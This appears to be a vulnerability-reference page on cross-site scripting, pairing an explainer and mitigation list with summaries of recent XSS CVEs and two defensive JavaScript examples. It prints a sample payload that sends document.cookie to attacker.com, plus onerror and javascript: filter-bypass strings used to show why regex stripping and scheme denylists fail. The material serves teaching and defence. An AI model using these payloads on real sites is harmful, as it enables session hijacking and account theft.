
Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

The attacker crafts input containing JavaScript, and the application incorporates that input into its HTML response without encoding it for the context it lands in. When a victim's browser renders the response, it executes the injected script as if it were legitimate code from the trusted site, with the same origin and the same session.

The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.

A typical attack flow starts with the attacker identifying an injection point: anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims load the page, their browsers execute this script within the origin of the legitimate domain. That gives the attacker every cookie not flagged HttpOnly, tokens held in localStorage or in the page, the full DOM, and the ability to send requests that carry the victim's session even when the session cookie itself cannot be read.

Impact

  • Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways (2018) suffered a Magecart-style supply chain compromise in which attackers modified a JavaScript file served from the airline's own site so that the payment page loaded card-skimming code. Strictly this was a tampered first-party script rather than an input-handling XSS flaw, but the effect is the same as stored XSS: attacker-controlled JavaScript ran in the site's origin and exfiltrated card details from roughly 380,000 transactions, showing how script injection enables payment fraud at scale.

Mitigation

  • Context-aware output encoding: encode at output time for the exact context the value lands in (HTML body, quoted attribute, JavaScript string, URL parameter); HTML-encode for HTML, JavaScript-encode for JS strings, URL-encode for URLs. Never rely on one generic escape, and always quote attribute values, since encoding alone cannot stop a breakout from an unquoted attribute.
  • Content Security Policy (CSP): deploy a strict policy (nonce- or hash-based script-src, no 'unsafe-inline') so injected inline scripts and off-origin script sources are blocked; treat it as a second layer, not a replacement for encoding.
  • HttpOnly and Secure cookie flags: keep session cookies out of document.cookie and off plaintext HTTP. This limits cookie theft but does not stop injected script from acting with the victim's session from inside the page.
  • Input validation: reject unexpected characters and patterns where the data format allows it, though this is defense-in-depth, not primary protection.
  • DOM-based XSS prevention: write user data with safe APIs such as textContent or setAttribute rather than innerHTML, outerHTML or document.write; never pass it to eval(), Function(), string-argument setTimeout/setInterval, or location sinks without validation; when real HTML markup is required, sanitize it with a maintained library (for example DOMPurify) before insertion.

Recent CVEs (11005)

EPSS 0% CVSS 1.9
LOW Monitor

Cross-site scripting in QianFox FoxCMS versions 1.2.0 through 1.2.6 allows a high-privileged attacker to inject malicious JavaScript via the /Tag/edit endpoint in the Administrator Backend, executing in the context of another user's browser session upon interaction. A proof-of-concept exploit has been publicly disclosed via a GitHub issue report, though the vendor has not yet acknowledged or responded to the disclosure. The CVSS 4.0 score of 1.9 reflects the severe prerequisites - administrator-level authentication plus passive user interaction - that sharply limit real-world exploitability, and the EPSS of 0.03% (9th percentile) indicates correspondingly low observed exploitation likelihood.

XSS
NVD GitHub VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Style Kits for Elementor (analogwp-templates) WordPress plugin versions up to and including 2.5.0 allows authenticated attackers with contributor-level access to inject persistent JavaScript payloads via the kit title parameter at the /wp-json/agwp/v1/tokens/save REST API endpoint. The injected script executes in the browser of any user who subsequently visits an affected page, with a Changed scope (S:C) indicating cross-user impact that can reach administrators. No public exploit identified at time of analysis; EPSS of 0.03% (9th percentile) signals low observed exploitation probability, though the contributor-level barrier is low on multi-author WordPress sites.

WordPress XSS
NVD VulDB
CVSS 6.1
MEDIUM This Month

XSS sanitizer bypass in LiquidJS's strip_html filter (all versions through 10.25.7) allows stored or reflected cross-site scripting via newline-embedded HTML tags. The filter's catch-all regex branch uses the `.` metacharacter without the `s` (dotAll) flag, so `.` never matches a newline and tags containing literal newline or carriage-return characters (e.g. <img\nsrc=x\nonerror=alert(1)>) pass through unmodified, while browsers parse such tags as fully valid HTML elements and execute the embedded event handlers. Publicly available exploit code exists; no vendor-released patch has been identified at time of analysis.

XSS CSRF Node.js
NVD GitHub
CVSS 4.7
MEDIUM PATCH This Month

CarrierWave's `content_type_denylist` silently fails to block MIME types containing regex metacharacters - most critically `image/svg+xml` - because string entries are interpolated directly into a regex without `Regexp.quote` or anchoring, so the `+` is treated as a quantifier rather than a literal. Any Ruby application relying on this denylist to prevent SVG uploads as stored-XSS protection is unprotected while believing the control is active. A publicly available proof-of-concept demonstrates the SVG bypass; no active exploitation has been confirmed and the issue is not listed in CISA KEV.
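The two regex failures above (the strip_html catch-all branch without dotAll, and the denylist entry interpolated into a regex unescaped) as one added example. This is not code from LiquidJS, CarrierWave or this page: both patterns are modelled on the descriptions, not copied from either project's source, the inputs are constructed, and the function names are illustrative. It is written in JavaScript for consistency with the other examples here; the denylist bug is the same in Ruby's Regexp.new versus Regexp.escape.

```javascript
// Added example (not code from LiquidJS, CarrierWave or this page).

// (a) A tag stripper whose catch-all branch is "<.*?>". In JavaScript "." does
//     not match "\n" or "\r" unless the "s" (dotAll) flag is present.
const STRIP_TAGS_BROKEN = /<script[\s\S]*?<\/script>|<!--[\s\S]*?-->|<.*?>/g;   // assumed shape
// Fix: a negated character class matches newlines too; adding the "s" flag to
// the original pattern would have the same effect.
const STRIP_TAGS_FIXED  = /<script[\s\S]*?<\/script>|<!--[\s\S]*?-->|<[^>]*>/g;

function stripHtmlBroken(s) { return String(s).replace(STRIP_TAGS_BROKEN, ""); }
function stripHtmlFixed(s)  { return String(s).replace(STRIP_TAGS_FIXED, ""); }

// Constructed inputs: the same <img> tag on one line and with newlines inside it.
// A browser treats both as a valid element with an onerror handler.
const ONE_LINE  = "<img src=x onerror=alert(1)>";
const MULTILINE = "<img\nsrc=x\nonerror=alert(1)>";

// (b) A content-type denylist whose entries go into a regex as-is. In
//     "image/svg+xml" the "+" is a quantifier, so the pattern matches
//     "image/svgxml", "image/svggxml", ... and never the real media type.
const DENYLIST = ["image/svg+xml", "text/html"];

function deniedBroken(contentType) {
  return DENYLIST.some((t) => new RegExp(t).test(contentType));
}

// Fix: escape regex metacharacters (Ruby: Regexp.escape), anchor the pattern,
// and compare only the lower-cased media type, without its ";charset=" parameters.
function escapeRegExp(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); }

function deniedFixed(contentType) {
  const mediaType = String(contentType).split(";")[0].trim().toLowerCase();
  return DENYLIST.some((t) => new RegExp("^" + escapeRegExp(t) + "$").test(mediaType));
}

function demo() {
  console.log("broken strip, one line :", JSON.stringify(stripHtmlBroken(ONE_LINE)));
  console.log("broken strip, multiline:", JSON.stringify(stripHtmlBroken(MULTILINE)));
  console.log("fixed strip, multiline :", JSON.stringify(stripHtmlFixed(MULTILINE)));
  console.log("broken denylist blocks image/svg+xml:", deniedBroken("image/svg+xml"));
  console.log("fixed denylist blocks image/svg+xml :", deniedFixed("image/svg+xml"));
}

if (typeof require !== "undefined" && require.main === module) demo();
```

Even the corrected stripper only removes things shaped like tags; it is a display helper, not a sanitizer for untrusted HTML, and whatever text survives still needs output encoding. Likewise the corrected denylist still trusts a client-declared content type: an upload check should allowlist permitted types, verify the file's actual content, and serve user files from a separate origin or with Content-Disposition: attachment so an SVG is never rendered inline on the application origin.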

XSS
NVD GitHub
HIGH PATCH This Week

Stored cross-site scripting (XSS) in Kirby CMS affects any site that uses the list field or a blocks field containing the list block. Per the vendor advisory, an authenticated Panel user holding update permission on such a field can bypass the Panel UI and POST unsanitized HTML directly to Kirby's content API, where it is persisted to the content file and later rendered verbatim in frontend templates, executing arbitrary JavaScript in the browsers of site visitors and logged-in users. Because the injected script is auto-firing on page load, it can hijack sessions or escalate privileges by issuing API calls as a viewing admin; no CVSS score, EPSS probability, or CISA KEV listing is available, and no public exploit was identified at time of analysis, though the vendor rates it high severity and has released fixes (Kirby 4.9.1 and 5.4.1).

XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored cross-site scripting in Prometheus versions 2.49.0 through 3.5.2/3.11.2 allows a low-privileged attacker who can inject crafted histogram metrics to execute arbitrary JavaScript in the browser of any user who views the affected metric in the legacy heatmap chart UI. Exploitation requires the non-default `--enable-feature=old-ui` flag to be set and the victim to navigate to the specific heatmap view. No public exploit code has been identified at time of analysis, but the vulnerability is technically straightforward - a missing `escapeHTML()` call on `le` label values rendered as axis tick labels in Graph.tsx. This is the third stored DOM XSS in Prometheus's web UI in recent years, following CVE-2019-10215 and CVE-2026-40179.

XSS Prometheus
NVD GitHub
EPSS 0% CVSS 1.8
LOW PATCH Monitor

The GDPR cookies module for Backdrop CMS (before 1.x-1.3.5) doesn't sufficiently protect visitors from Cross Site Scripting (XSS) if a malicious value has been provided for the optional 'Info content' field for the YouTube service. This is mitigated by the fact that an attacker must have a role with the permission "Create a GDPR Cookies Service" or "Edit any GDPR Cookies Service" and a site must have added a YouTube service as configuration.

XSS
NVD VulDB
EPSS 0% CVSS 5.2
MEDIUM This Month

Arbitrary JavaScript execution in SailingLab AppLock 4.3.8 for Android is triggered by a malicious co-installed app sending a crafted VIEW intent with a javascript: URI to the exposed BrowserMainActivity component. Because AppLock operates with elevated permissions by design (it restricts access to other apps), this unsafe WebView navigation path creates a changed-scope impact: script execution occurs within AppLock's privilege context, enabling UI spoofing and potential privilege escalation beyond what a normal app could achieve. No public exploit identified at time of analysis beyond the publicly available proof-of-concept published by the reporter on GitHub.

XSS Privilege Escalation Google +1
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM This Month

Cross-site scripting (XSS) in PbootCMS v.3.2.11 allows a high-privileged authenticated attacker to inject malicious JavaScript into the site configuration functionality, which executes in the browser of any user who subsequently views the affected configuration page. Despite the description using the term 'code injection,' CWE-79 and the XSS tag confirm this is a stored or reflected XSS class vulnerability, not arbitrary server-side code execution. A GitHub-hosted proof-of-concept exists (TazmiDev/CVE-2026-36239), and no public patch has been identified at time of analysis; no active exploitation has been confirmed by CISA KEV.

XSS
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM This Month

A cross-site scripting vulnerability exists in Aterm. Arbitrary scripts may be executed in the web browser of a user accessing the web management interface via adjacent network.

XSS
NVD
EPSS 0% CVSS 2.0
LOW Monitor

Stored or reflected cross-site scripting in vBulletin 6.x login component allows authenticated users with low privileges to inject malicious scripts that execute when other users interact with the manipulated login function. Public proof-of-concept exists (CVSS E:P) but detailed exploitation steps are being withheld by VulDB. Vendor did not respond to disclosure, and no patch release has been announced. EPSS data unavailable; not listed in CISA KEV, suggesting limited observed exploitation despite public POC availability.

XSS
NVD VulDB
EPSS 0%
This Week

TypeBot is a chatbot builder. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application neither restricts nor sanitizes SVG/XML uploads and serves them inline from the application domain, so an uploaded SVG carrying embedded JavaScript executes when the file is opened from its public, permanent link. Because the payload is persisted on Typebot's own infrastructure (app.typebot.io), the link can be handed to any victim, enabling session/token theft, account takeover and exfiltration of sensitive user data. This issue has been fixed in version 3.16.0.

XSS Typebot Io
NVD GitHub
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

Stored XSS in Typebot's JavaScript viewer embed (packages/embeds/js) allows any authenticated bot author - including free-tier users - to inject arbitrary JavaScript into a visitor's browser by setting a rich text bubble link URL to a javascript: URI. When a visitor clicks the malicious link within an embedded bot, the payload executes in the host page's origin (S:C scope change), enabling exfiltration of cookies and session tokens from the embedding third-party site. No public exploit code or active exploitation is confirmed at time of analysis; a vendor-released patch is available in v3.16.0.

XSS Typebot Io
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Stored cross-site scripting in Typebot chatbot builder versions 3.15.2 and prior allows a malicious imported or collaborator-crafted bot to execute arbitrary HTML/JavaScript in the authenticated builder context via the RatingButton component's customIcon.svg field. Because the builder preview renders bots inline on builder.typebot.io under a CSP permitting 'unsafe-inline', successful exploitation enables session hijacking and privilege escalation within the SaaS builder, with no public exploit identified at time of analysis.

XSS Privilege Escalation Typebot Io
NVD GitHub VulDB
EPSS 0% CVSS 6.1
PATCH Awaiting Data

Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering.

XSS Golang Org X Net Html
NVD
EPSS 0% CVSS 2.1
LOW This Week

Concrete CMS version 9.0 to 9.5.0 is vulnerable to Stored XSS via page name in the Atomik theme. A rogue editor can inject arbitrary JavaScript that executes in the context of any authenticated user visiting the affected account pages. This can lead to session hijacking, credential theft, malicious actions performed on behalf of users, and potential privilege escalation. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 2.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting.

XSS Privilege Escalation Concrete Cms
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in WP Blockade - Visual Page Builder (all versions through 0.9.14) allows authenticated attackers holding at minimum a WordPress Subscriber-level account to inject arbitrary JavaScript into pages rendered in a victim's browser. The vulnerability exists in the render_shortcode_preview() function, which passes raw GET input through do_shortcode() without sanitization or output escaping - when the input is not a recognized shortcode, WordPress returns it verbatim, causing any embedded script to execute. Exploitation requires social engineering an authenticated user (e.g., an admin) into clicking a crafted link, but the low barrier to entry (Subscriber-level account) significantly widens the attacker pool on multi-user WordPress installations. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the KIA Subtitle WordPress plugin (all versions through 4.0.1) allows authenticated attackers with Contributor-level access to inject persistent malicious scripts via the `before` and `after` attributes of the `the-subtitle` shortcode. Any site visitor loading a page containing the injected shortcode will execute the attacker's script in their browser context. No public exploit code or CISA KEV listing has been identified at time of analysis, but the low privilege bar (Contributor) and network-accessible attack vector make this a meaningful risk for multi-author WordPress sites.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in the CBX 5 Star Rating & Review WordPress plugin (versions up to and including 1.0.7) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'page' parameter rendered in administrative log templates. Successful exploitation requires social engineering an authenticated administrator into clicking a crafted URL, limiting automated mass exploitation while remaining a realistic threat in targeted phishing campaigns against WordPress site owners. No public exploit code or CISA KEV listing has been identified at time of analysis.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in the Draft List WordPress plugin (versions up to and including 2.6.3) allows authenticated attackers with author-level access to inject arbitrary web scripts into draft post titles using attribute-breakout techniques. The critical aggravating factor is the changed scope (S:C in CVSS): the unescaped rendering path is specifically triggered for users who lack edit capabilities, meaning the payload executes against unauthenticated visitors and subscribers - not just privileged users. No public exploit has been identified at time of analysis, but Wordfence disclosure and the low privilege bar (author-level sufficient) make this a meaningful cross-user threat in any multi-author WordPress environment.

WordPress XSS
NVD VulDB
EPSS 0% CVSS 9.3
PATCH Awaiting Data

A cross-site scripting (XSS) vulnerability in SketchUp 2026's Dynamic Components feature allows remote code execution and local file exfiltration through maliciously crafted SKP files. The vulnerability stems from improper input sanitization in the component options window, enabling attackers to execute arbitrary system commands and read local files without user interaction by exploiting an embedded Internet Explorer 11 browser.

XSS RCE Information Disclosure +2
NVD
EPSS 0% CVSS 6.1
Awaiting Data

Cross Site Scripting vulnerability in Advantech WebAccess/SCADA 8.0-2015.08.16 allows a remote attacker to obtain sensitive information via the decryption field in the Create New Project User component

XSS
NVD GitHub
EPSS 0% CVSS 2.0
LOW Monitor

Stored XSS in Concrete CMS 9.5.0 and below allows a high-privileged authenticated attacker to inject malicious scripts via the cvName parameter of external-link pages, exploiting a sanitization bypass in the updateCollectionAliasExternal function. The injected payload is persisted server-side and executes in the browser of any user who subsequently views the affected page within the CMS backend. The vendor-assigned CVSS v4.0 score of 2.0 reflects constrained real-world impact: exploitation requires admin-level credentials, prerequisite attack conditions (AT:P), and passive victim interaction, with no public exploit identified at time of analysis.

XSS
NVD
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored cross-site scripting in the Simple Hierarchical Select (SHS) module for Drupal 7 (versions 7.x-1.0 through 7.x-1.10) enables authenticated attackers with taxonomy term editing privileges to inject malicious scripts via unsanitized term names. Two distinct code paths are confirmed vulnerable: field formatter output rendered by shs_field_formatter_view and term-tree child data generated by shs_term_get_children, both of which fail to apply proper output escaping before HTML rendering. No public exploit is identified at time of analysis and no CISA KEV listing exists, but the network-accessible attack vector combined with Drupal 7's end-of-life status substantially elevates residual risk for unpatched deployments.

XSS
NVD HeroDevs
EPSS 0% CVSS 5.1
MEDIUM This Month

Stored cross-site scripting in the Drupal 7 Term Reference Tree module (versions 7.x-1.x through 7.x-1.11) exposes two distinct injection vectors in its widget and formatter rendering pipeline, both exploitable by any authenticated user with taxonomy term edit permissions. Vector A triggers when the Token module is enabled and token display templates are configured, allowing attacker-controlled term description output to render unsanitized. Vector B targets the widget itself, where taxonomy term labels are written to form output without sanitization, executing injected scripts in the browsers of users who view any form containing the widget. No public exploit code has been identified at time of analysis and the vulnerability is not listed in CISA KEV, but the low privilege bar and persistent nature of stored XSS make this a meaningful risk in multi-user Drupal 7 deployments.

XSS
NVD HeroDevs
LOW PATCH Monitor

Cross-site scripting in twig/markdown-extra and twig/cssinliner-extra arises from three filters - html_to_markdown, markdown_to_html, and inline_css - being incorrectly registered with is_safe => ['all'], which instructs Twig's autoescaper to suppress output encoding in every context including JS, CSS, and URL. When attacker-controlled content flows through these filters and the result is interpolated into a non-HTML context such as an inline script block, the autoescaper emits the raw output verbatim, enabling XSS without the developer ever using the explicit |raw bypass. Notably, html_to_markdown has an additional entity-decoding gadget via league/html-to-markdown that converts encoded HTML entities back to live markup during code span generation, creating a secondary injection path even in HTML contexts. No public exploit identified at time of analysis and no CISA KEV listing.

XSS
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

Stored cross-site scripting in Concrete CMS 9.5.0 and earlier allows authenticated editors to inject persistent JavaScript via the unvalidated 'height' parameter, executing in any subsequent visitor's browser. The CVSS 4.0 score of 7.3 reflects high privilege requirements (editor role) combined with high impact, and no public exploit identified at time of analysis.

XSS
NVD
EPSS 0% CVSS 7.3
HIGH This Week

Stored cross-site scripting in Concrete CMS 9.5.0 and earlier allows a high-privileged admin to inject arbitrary HTML/JavaScript into the OAuth authorize template via the integration name field. The flaw arises because the integration name is wrapped in <strong> tags by PHP string interpolation before being passed to the t() translation helper, causing the resulting raw HTML to be rendered when end users view the OAuth consent screen. No public exploit identified at time of analysis, but a rogue or compromised admin could potentially harvest OAuth login submissions from victims.

PHP XSS
NVD
EPSS 0% CVSS 6.0
MEDIUM This Month

Reflected XSS in Concrete CMS 9.5.0 and below allows a remote unauthenticated attacker to inject and execute arbitrary JavaScript in the browser of an authenticated admin or report viewer who clicks a crafted URL targeting the legacy form reports dashboard. The vulnerable component, Concrete\Core\Legacy\Pagination, raw-interpolates a user-controlled URL value directly into an HTML href attribute, enabling attribute injection per CWE-83. With a CVSS 4.0 score of 6.0 and high confidentiality impact (VC:H) on the vulnerable system, successful exploitation can lead to session token theft; no public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV.

XSS
NVD
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Stored cross-site scripting in Webmin before 2.641 allows low-privileged authenticated attackers to inject arbitrary JavaScript via the email template description field in the System and Server Status module. The payload is persisted through save_tmpl.cgi and rendered without HTML encoding by list_tmpls.cgi, executing in the browser of any user who subsequently views the template list - a population likely to include privileged administrators. No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV; a vendor-released patch (Webmin 2.641) is available.

XSS Webmin
NVD VulDB
CVSS 4.6
MEDIUM PATCH This Month

HTML injection (stored XSS) in the Umbraco CMS Backoffice confirmation dialog allows authenticated low-privilege users to inject arbitrary HTML into an input field that is subsequently rendered without output encoding when a confirmation dialog is triggered. Affected versions span nuget/Umbraco.Cms 14.0.0 through 17.3.5. The CVSS score of 4.6 reflects the constrained attack surface: exploitation requires an authenticated Backoffice session and a second victim user to interact with the dialog, limiting blast radius to the admin panel rather than public-facing surfaces. No public exploit identified at time of analysis and this CVE does not appear in the CISA KEV catalog.

XSS
NVD GitHub
CVSS 5.4
MEDIUM This Month

NocoDB's refresh-token cookie in versions up to and including 0.301.3 was misconfigured in `setTokenCookie` - issued with only `httpOnly: true` and no `secure` or `sameSite` attributes - exposing two distinct attack paths: cookie interception over plain HTTP networks and CSRF against the `POST /api/v2/auth/token/refresh` endpoint, which returns a new JWT without validating any CSRF token. Because refresh tokens carry multi-day expiry windows via `NC_REFRESH_TOKEN_EXP_IN_DAYS`, successful exploitation yields a long-lived credential for follow-on account access. No public exploit has been identified at time of analysis and no released patched version is confirmed, despite a documented fix in the GitHub advisory GHSA-f74w-272x-mqcv.

XSS CSRF
NVD GitHub
CVSS 6.1
MEDIUM This Month

Reflected XSS in NocoDB's Page Leaving Warning component allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted URL containing a `javascript:` URI in the `ncRedirectUrl` or `ncBackUrl` query parameters. All NocoDB npm releases up to and including version 0.301.3 are affected, and no vendor-released patch has been identified at time of analysis. No active exploitation has been confirmed (not in CISA KEV), but the GitHub Security Advisory provides sufficient technical specificity - including the exact vulnerable file and parameter names - to enable independent POC development.
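The two javascript: URI entries above (the Typebot rich-text bubble link and the NocoDB ncRedirectUrl/ncBackUrl parameters) share one fix, shown here as an added example that is not code from Typebot, NocoDB or this page: parse the value with the WHATWG URL parser, which is what the browser will use, then allowlist what you accept. The application origin https://app.example, the scheme allowlist and the function names are assumptions for the example. It also shows why a scheme denylist on the raw string fails, which goes beyond the two entries but follows directly from how browsers parse URLs.

```javascript
// Added example (not code from Typebot, NocoDB or this page).

const ALLOWED_LINK_SCHEMES = new Set(["http:", "https:", "mailto:"]); // assumed policy
const APP_ORIGIN = "https://app.example";                             // assumed origin

// Author-supplied link for a rich-text bubble: must be absolute and use an
// allowed scheme. Anything else becomes an inert fallback.
function safeLinkHref(input, fallback = "#") {
  let url;
  try { url = new URL(String(input)); } catch { return fallback; } // relative or unparsable
  return ALLOWED_LINK_SCHEMES.has(url.protocol) ? url.href : fallback;
}

// Post-login / back-navigation target: resolve against our own origin and keep
// only same-origin results, returned as a path so no host can leak through.
// javascript: and data: URLs have the opaque origin "null"; "//evil.example"
// and "https://evil.example" resolve to a different origin; all fall back.
function safeRedirectTarget(input, appOrigin = APP_ORIGIN, fallback = "/") {
  let url;
  try { url = new URL(String(input), appOrigin); } catch { return fallback; }
  if (url.origin !== appOrigin) return fallback;
  return url.pathname + url.search + url.hash;
}

// What NOT to do: a scheme denylist on the raw string. The URL parser strips
// leading whitespace and embedded tab/newline characters before reading the
// scheme, so these constructed inputs pass the pattern yet still run as
// javascript: in the browser.
function naiveSchemeDenylistAllows(input) {
  return !/^(javascript|data|vbscript):/i.test(input);
}

const DENYLIST_BYPASSES = [" javascript:alert(1)", "java\tscript:alert(1)", "java\nscript:alert(1)"];

function demo() {
  for (const b of DENYLIST_BYPASSES) {
    console.log(JSON.stringify(b), "denylist allows:", naiveSchemeDenylistAllows(b),
                "parsed scheme:", new URL(b).protocol, "safeLinkHref:", safeLinkHref(b));
  }
  console.log(safeRedirectTarget("/dashboard?tab=1#top"));      // same-origin path kept
  console.log(safeRedirectTarget("//evil.example/phish"));      // protocol-relative host dropped
  console.log(safeRedirectTarget("javascript:alert(1)"));       // opaque origin dropped
}

if (typeof require !== "undefined" && require.main === module) demo();
```

Returning a path rather than url.href from safeRedirectTarget is deliberate: it makes it impossible for a later refactor of the origin comparison to turn the function back into an open redirect. For the bubble link, the sanitized href still has to be inserted into a quoted, HTML-encoded attribute; scheme validation and output encoding are separate controls.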

XSS
NVD GitHub
CVSS 7.2
HIGH PATCH This Week

Stored/reflected cross-site scripting in the md-fileserver npm package (versions prior to 1.10.3) allows remote unauthenticated attackers to execute arbitrary JavaScript in a viewer's browser by uploading or supplying Markdown files containing raw HTML or script tags. The vulnerability stems from markdown-it being configured with html:true and rendered output being injected into the template without sanitization or output encoding. No public exploit identified at time of analysis beyond the vendor-provided PoC, and the issue is not currently listed in CISA KEV.

XSS Information Disclosure CSRF
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows JavaScript injection via ten unsanitized POST parameters in ticketsmdb_import.php, with payloads executing in the victim's browser upon response rendering. The vendor-released patch v3.44.2 addresses this as part of a critical security update that simultaneously fixed 88 vulnerabilities including 69 XSS and 19 SQL injection issues across the codebase, suggesting systemic input sanitization failures rather than an isolated defect. No public exploit code has been identified at time of analysis, and this CVE is not listed in the CISA KEV catalog.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets (all versions before 3.44.2) allows injection of arbitrary JavaScript via the unsanitized ticket_id GET parameter in routes_i.php, rendered directly into HTML form hidden input value attributes. When a victim visits or is redirected to a crafted URL, the payload executes in their browser within the application's security context. No public exploit or CISA KEV listing exists at time of analysis, but the patch release (v3.44.2) simultaneously fixes 88 vulnerabilities - 69 of them XSS - indicating systemic input sanitization failures throughout the codebase that substantially elevate the overall risk posture of this application.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets (all versions before 3.44.2) allows attackers to inject arbitrary JavaScript through unsanitized id and ticket_id GET parameters in patient_w.php, which are written directly into an HTML form action URL without output encoding. Successful exploitation requires the victim to actively click a crafted link, after which the payload executes in the victim's browser under the application's origin, enabling session hijacking or unauthorized actions. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in the CISA KEV catalog; however, the scale of the v3.44.2 release - patching 69 XSS and 19 SQL injection issues simultaneously - suggests the codebase has historically received minimal security review.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets before 3.44.2 exposes authenticated users to arbitrary JavaScript execution via unsanitized GET parameters in patient.php. The vulnerability exists in the id and ticket_id parameters, whose values are written directly into an HTML form action URL without output encoding, enabling an attacker to craft a malicious link that executes script in the victim's browser upon rendering. No public exploit or active exploitation has been identified at time of analysis; however, the vendor's v3.44.2 release confirms this is one of 69 XSS vulnerabilities patched simultaneously, indicating systemic input-handling failures across the application.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected XSS in Open ISES Tickets (all versions before 3.44.2) allows JavaScript injection via the unsanitized `ref` and `mode_orig` POST parameters in `os_watch.php`, which are written verbatim into HTML form hidden input value attributes without output encoding. An attacker who can trick a user into submitting a crafted POST request will have arbitrary JavaScript execute in that user's browser session, enabling session theft, credential harvesting, or UI redress attacks. No public exploit code or CISA KEV listing has been identified at time of analysis; however, the patch release simultaneously addressed 88 vulnerabilities - including 19 SQL injection issues - suggesting this application carried significant accumulated security debt that amplifies organizational risk beyond this single CVE.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before version 3.44.2 allows an attacker to inject arbitrary JavaScript via the unsanitized _type POST parameter in landb.php, which is echoed directly into an HTML form hidden input value attribute without encoding. When a victim renders the crafted response, the injected script executes in their browser context, enabling session hijacking, credential theft, or forced action on behalf of the victim. This CVE is one of 69 XSS vulnerabilities addressed in the v3.44.2 critical security update; no public exploit has been identified at time of analysis and it is not listed in CISA KEV.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before v3.44.2 enables JavaScript injection via the frm_add_str POST parameter in ics214.php, which reflects the unsanitized value directly into an HTML form hidden input value attribute. When a victim renders the crafted response, the payload executes in their browser session, enabling session hijacking or action-on-behalf-of-user attacks. No public exploit has been identified and this CVE is not listed in CISA KEV, though the v3.44.2 release addresses 88 total vulnerabilities - including SQL injection and hardcoded credentials - making upgrade broadly critical regardless of this specific finding.

PHP XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Reflected cross-site scripting in Open ISES Tickets before 3.44.2 allows a malicious actor to inject arbitrary JavaScript into a victim's browser session via the unsanitized frm_add_str POST parameter in ics213rr.php, where the value is written directly into an HTML form hidden input attribute without escaping. The CVSS 4.0 vector scores this at 5.1 with low confidentiality and integrity impact on the subsequent system (SC:L/SI:L): the harm lands in the victim's browser session rather than on the vulnerable server itself. No public exploit code or CISA KEV listing has been identified at time of analysis; a vendor-released patch (v3.44.2) is confirmed available and also resolves 87 additional vulnerabilities including SQL injection, hardcoded credentials, and SSL validation failures.

PHP XSS
NVD GitHub
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

